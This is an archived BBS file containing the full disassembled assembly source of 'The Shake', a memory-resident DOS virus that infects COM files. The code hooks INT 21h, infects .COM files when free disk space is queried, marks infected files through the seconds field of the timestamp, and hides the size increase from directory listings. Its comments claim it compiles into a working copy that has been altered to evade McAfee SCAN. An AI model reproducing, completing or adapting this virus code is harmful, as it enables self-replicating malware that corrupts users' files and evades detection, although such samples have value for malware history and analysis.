The Unsorted BBS Collection
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Assembly Source File
338 lines
; The Shake Virus
; Resident COM infector.
; Patch into INT 21.
; Randomly display, "Shake well before use!" upon file execute
; Adds 476 bytes to infected program
; Does not show file increase while resident (Stealth)
; Infects files upon getting free disk space (End of the directory)
; NOTE: This code will compile into a working copy of The Shake virus. Any
; ill attempt to modify this source code will result in a copy that does not
; work.
; ANOTHER NOTE: This code has allready been changed in order to avoid detection
; by McAffe's SCAN v7.6C
; Disassembled 4/30/91 by The High Evolutionary
; The RABID International Development Corp.
int_21_vec equ 84h ; Vector to INT 21 (21*4)
mem_loc equ 90h ; Our memory location (I think)
code_seg equ 92h ; Segment of code to save from
; CS
code_loc equ 0 ; Code location for infection
our_code equ 0B2h ; Where the text resides for
; INT 21, AH 09h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
shake proc far
db 0E8h, 01h, 00h ;CALL 104...
and [bp+50h],bx
call virus_start
shake endp
virus_start proc near
pop si
; Set up a marker that denotes that we are resident allready...
mov ax,4203h ; Move file pointer
int 21h
cmp ax,1234h ; 1234 will be the marker
jne allocate_memory ; Jump if not equal
jmp short continue ;
db 90h ; NOP
mov ah,4Ah ;
mov bx,0FFFFh ; Request FFFF blocks
int 21h
sub bx,500h ; Subtract 500 from total
; available blocks
mov ah,4Ah ; Try it again
int 21h
mov ah,48h ; Allocate memory block
mov bx,1Eh ; Allocate 1Eh memory para's
int 21h
mov es,ax ; Save initial segment in ES
sub si,5 ; Sub 5 from SI (Why?)
xor di,di ; DI=0
mov cx,1DCh ; 476 bytes (Virus length)
; Copy virus code to DI
rep movsb ; Rep when cx >0 Mov [si] to
; es:[di]
push ax
mov ax,3Ch
push ax
push ds
xor ax,ax ; Zero register
mov ds,ax
; Patch into old INT 21
les bx,dword ptr ds:int_21_vec ; Get address of INT 21
; vector and save it in BX
mov word ptr cs:[1B7h],bx ; Point it to our memory loc.
mov word ptr cs:[1B9h],es ;...and get the segment
mov word ptr ds:int_21_vec,7Ch
mov word ptr ds:int_21_vec+2,cs
pop ds
call save_bx
virus_start endp
save_bx proc near
pop si
sub si,5Dh
mov ax,word ptr cs:[1B4h][si]
mov word ptr ds:[100h],ax
mov ah,byte ptr cs:[1B6h][si]
mov byte ptr ds:[102h],ah
push ds
pop es
pop ax
push ds
mov bx,100h
push bx
save_bx endp
cmp ah,11h ; Are we searching for the
; first FCB entry?
je first_FCB ; Jump if equal
cmp ah,12h ; Are we searching for the
; next FCB entry?
jne next_FCB ; Jump if not equal
pushf ; Push flags
call dword ptr cs:[1B7h] ; Call old INT 21
push ax
push bx
push es
mov ah,2Fh ; Get DTA address
int 21h
cmp byte ptr es:[bx],0FFh
jne new_DTA ; Jump if not equal
add bx,7
mov ax,es:[bx+17h]
and ax,1Fh ; Get the seconds stamp from
; the COM file
cmp ax,1Eh ; Is it infected?
jne return_flags ; Jump if not equal
; We sub 476 bytes from the DTA so that infected files will look normal.
; Stealth???
sub word ptr es:[bx+1Dh],1DCh ; 476 bytes
pop es
pop bx
pop ax
iret ; Interrupt return
cmp ah,4Bh ; Are we executing a file?
jne not_exec ; No? Continue...
push ax
push dx
mov ah,2Ch ; Get system time
int 21h
; Randomizer routine to see if we print out the message
and dl,0Fh ; AND 100th seconds by 0Fh
or dl,dl ; Zero ?
jnz no_message ; Not zero? Then don't print
; the message
push cs
pop ds
mov word ptr ds:our_code,25EBh ; Load DS with the location
; of our code in order to
; correctly print out the
; message
mov ah,9 ; Print message
mov dx,offset ds:[1BDh] ; Offset of string location
int 21h
add sp,4
iret ; Interrupt return
pop dx
pop ax
; Check to see if we are resident allready...
cmp ax,4203h ; Are we moving the file
; pointer?
jne no_ptr_move ; Jump if not equal
mov ax,1234h
iret ; Interrupt return
cmp ah,36h ; Are we getting free
; disk space?
je free_disk_space ; Jump if equal
jmp do_int_21 ; No? Call INT 21
push ax
push bx
push cx
push dx ; Restore all of the regs.
push ds
push es
push cs
pop ds
mov ah,4Eh ; Find first file
mov dx,offset ds:[1D6h]
xor cx,cx ; Normal files...
int 21h
jnc found_file ; Jump if carry=0
jmp return_to_int
mov ah,2Fh ; Get DTA address
int 21h
mov ax,es:[bx+16h]
and ax,1Fh
cmp ax,1Eh ; Is it infected?
jne infect_file ; Jump if not equal
jmp find_next
push word ptr es:[bx+16h]
push word ptr es:[bx+18h]
xor ax,ax ; Zero register
mov ds,ax
mov word ptr ds:mem_loc,1AEh
mov ds:code_seg,cs
mov ax,3D02h ; Open file with Read/Write
; access
mov dx,bx
add dx,1Eh
push es
pop ds
int 21h
mov word ptr cs:[1BBh],ax
push cs
pop ds
mov ah,3Fh ; Read file
mov cx,3 ; 3 bytes
mov dx,offset ds:[1B4h] ; To buffer area...
mov bx,word ptr ds:[1BBh] ; File handle...
int 21h
; Scan string started here
mov ax,4202h ; Move file pointer to the
; end of the file
xor dx,dx ; DX=0
mov cx,dx
int 21h
cmp ax,0F000h
jae close_file
sub ax,3
; Scan string ended here
mov word ptr ds:[1B2h],ax
mov ah,40h ; Write file/device
mov cx,1DCh ; 476 bytes
push cs
pop ds
mov dx,code_loc ; Pointer to buffer area
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc close_file ; Jump if we fucked up...
mov ax,4200h ; Move file pointer to start
; of file
xor dx,dx ; DX=0
mov cx,dx
int 21h
mov ah,40h ; Write file/device
mov cx,3 ; 3 bytes
mov dx,offset ds:[1B1h] ; Set for JMP
int 21h
jc close_file ; Jump if carry Set
mov ax,5701h ; Set file date/time
pop dx
pop cx
and cx,0FFFEh
or cx,1Eh ; New seconds
int 21h
; Note, we do not preserve the old filestamp
mov ah,3Eh ; Close file
mov bx,word ptr cs:[1BBh]
int 21h
jmp short return_to_int
mov ah,4Fh ; Find next file
int 21h
jc return_to_int ; Jump if carry Set
jmp found_file
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[1B7h]
; The following instructions originally appeared as hex codes (DB)
mov al,03 ;B0 03
iret ;CF
db 0e8h,0d8h,062h ;CALL 63DE
mov ah,4ch ;B4 4C
int 60 ;CD 60
adc al,6ah ;14 6A
add al,[di] ;02 05
add [bx],al ;00 07
db 'Shake well before use !$'
db '*.com',0
seg_a ends
end start
════ Data Items ════════════════════════
seg:off type & options label comments
------- -------------- -------------- --------------
0000:0084 dd, equ ; int_21_vec
0000:0090 dw, equ ; mem_loc
0000:0092 dw, equ ; code_seg
76DD:0000 db, equ ; code_loc
76DD:00B2 dw, equ ; our_code
seg_a:0100 dw ; data_7
seg_a:0102 db ; data_8
seg_a:01B1 db ; Jump Location
seg_a:01B2 dw ; File to infect
seg_a:01B4 dw ; Virus Segment
seg_a:01B6 db ; Virus Code Segment
seg_a:01B7 dw, r 2 ; Old Int 21 vector
seg_a:01BB dw ; File Handle
seg_a:01BD da, r 11 ; data_16
seg_a:01D6 db ; data_17